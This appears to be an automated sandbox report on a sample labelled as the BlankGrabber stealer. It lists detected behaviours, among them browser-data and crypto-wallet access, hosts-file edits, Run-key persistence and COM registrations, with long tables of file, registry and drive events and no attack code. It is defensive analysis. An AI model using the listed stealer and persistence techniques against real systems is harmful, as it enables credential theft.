Malware Analysis Report

2024-10-10 08:20

Sample ID 240603-cvmgfshc26
Target $RH4JZXS.exe
SHA256 8de3d83c8da7be0827042b335b99a63f75fddca8646f2ad4ead12bea2b4f47b9
Tags
blankgrabber execution persistence spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8de3d83c8da7be0827042b335b99a63f75fddca8646f2ad4ead12bea2b4f47b9

Threat Level: Known bad

The file $RH4JZXS.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber execution persistence spyware stealer upx

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Drops file in Drivers directory

Loads dropped DLL

Registers COM server for autorun

Executes dropped EXE

Reads user/profile data of web browsers

UPX packed file

Enumerates connected drives

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

Modifies registry class

Runs ping.exe

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Detects videocard installed

Enumerates system info in registry

Modifies registry key

Suspicious use of FindShellTrayWindow

Enumerates processes with tasklist

Gathers system information

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Views/modifies file attributes

NTFS ADS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 02:23

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 02:23

Reported

2024-06-03 02:41

Platform

win11-20240426-en

Max time kernel

909s

Max time network

458s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI39762\rar.exe N/A
N/A N/A C:\Users\Admin\Downloads\VisualCppRedist_AIO_x86_x64.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe N/A
N/A N/A C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe N/A
N/A N/A C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe N/A
N/A N/A C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe N/A
N/A N/A C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe N/A
N/A N/A C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\syswow64\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A
N/A N/A \??\c:\Windows\System32\MsiExec.exe N/A

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{64654B35-A024-4807-89D3-C6FDB5A260C7}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3133A7FE-BC5F-4D81-BF02-184ECC88D66E}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{99E0D1EC-0A0D-4E50-B8A1-82A8B6ECE5CB}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{274C2936-A842-45f3-A457-FB4BA4ED1BA2}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A249E9F6-5B28-4ED1-8AF0-C9B9C5195486}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EC04D82C-AA59-4ba4-96B1-27BE3FF05E00}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{83081C08-382C-4ED4-ACCF-DCBECA021010}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{99D651D7-5F7C-470E-8A3B-774D5D9536AC}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{760681E7-B985-41CE-BCBE-2985A1DFC61C}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F09D237B-3FD1-4900-BEF2-3471CA68142D}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{99D651D7-5F7C-470E-8A3B-774D5D9536AC}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E3C66D5-58D4-491E-A7D4-64AF99AF6E8B}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{3133A7FE-BC5F-4D81-BF02-184ECC88D66E}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{274C2936-A842-45f3-A457-FB4BA4ED1BA2}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{760681E7-B985-41CE-BCBE-2985A1DFC61C}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{99E0D1EC-0A0D-4E50-B8A1-82A8B6ECE5CB}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{274C2936-A842-45f3-A457-FB4BA4ED1BA2}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A249E9F6-5B28-4ED1-8AF0-C9B9C5195486}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F09D237B-3FD1-4900-BEF2-3471CA68142D}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EC04D82C-AA59-4ba4-96B1-27BE3FF05E00}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{A37BBB42-E8C1-4E09-B9CA-F009CE620C08}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A37BBB42-E8C1-4E09-B9CA-F009CE620C08}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{A249E9F6-5B28-4ED1-8AF0-C9B9C5195486}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{64654B35-A024-4807-89D3-C6FDB5A260C7}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{EC04D82C-AA59-4ba4-96B1-27BE3FF05E00}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E3C66D5-58D4-491E-A7D4-64AF99AF6E8B}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{760681E7-B985-41CE-BCBE-2985A1DFC61C}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{F09D237B-3FD1-4900-BEF2-3471CA68142D}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{83081C08-382C-4ED4-ACCF-DCBECA021010}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{83081C08-382C-4ED4-ACCF-DCBECA021010}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{99D651D7-5F7C-470E-8A3B-774D5D9536AC}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3133A7FE-BC5F-4D81-BF02-184ECC88D66E}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{4E3C66D5-58D4-491E-A7D4-64AF99AF6E8B}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{99E0D1EC-0A0D-4E50-B8A1-82A8B6ECE5CB}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{64654B35-A024-4807-89D3-C6FDB5A260C7}\InprocServer32\ = "C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" C:\Windows\system32\msiexec.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{4d8dcf8c-a72a-43e1-9833-c12724db736e} = "\"C:\\ProgramData\\Package Cache\\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\\VC_redist.x86.exe\" /burn.runonce" C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13} = "\"C:\\ProgramData\\Package Cache\\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\\VC_redist.x64.exe\" /burn.runonce" C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} = "\"C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\" /burn.log.append \"C:\\Users\\Admin\\AppData\\Local\\Temp\\dd_vcredist_x86_20240603022647.log\" /uninstall /passive /norestart ignored /burn.runonce" C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6} = "\"C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\" /burn.log.append \"C:\\Users\\Admin\\AppData\\Local\\Temp\\dd_vcredist_amd64_20240603022655.log\" /uninstall /passive /norestart ignored /burn.runonce" C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{61087a79-ac85-455c-934d-1fa22cc64f36} = "\"C:\\ProgramData\\Package Cache\\{61087a79-ac85-455c-934d-1fa22cc64f36}\\vcredist_x86.exe\" /burn.runonce" C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{ef6b00ec-13e1-4c25-9064-b2f383cb8412} = "\"C:\\ProgramData\\Package Cache\\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\\vcredist_x64.exe\" /burn.runonce" C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\msvcr110.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\msvcp140_atomic_wait.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Windows\SysWOW64\mfc100jpn.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\mfc70jpn.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\mfc120u.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc100fra.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfcm110.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc120deu.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc120esn.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\mfc70.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfc140rus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc120.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\msvcr100.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\comct332.ocx C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\vccorlib110.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\vcruntime140.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\vcamp140.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Windows\SysWOW64\mfc100u.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Windows\SysWOW64\mfc100rus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\atl110.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\vccorlib120.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\vccorlib120.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\msvcp140_2.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfc110chs.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\mfc120rus.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfcm120u.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc120jpn.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\vcomp110.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\mfc140jpn.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\mfc71u.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\vcruntime140_threads.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\vcomp120.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\mfc70chs.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Windows\SysWOW64\mfc100esn.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfcm140u.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc110ita.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc140enu.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfc120.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\vb40032.dll C:\Windows\system32\msiexec.exe N/A
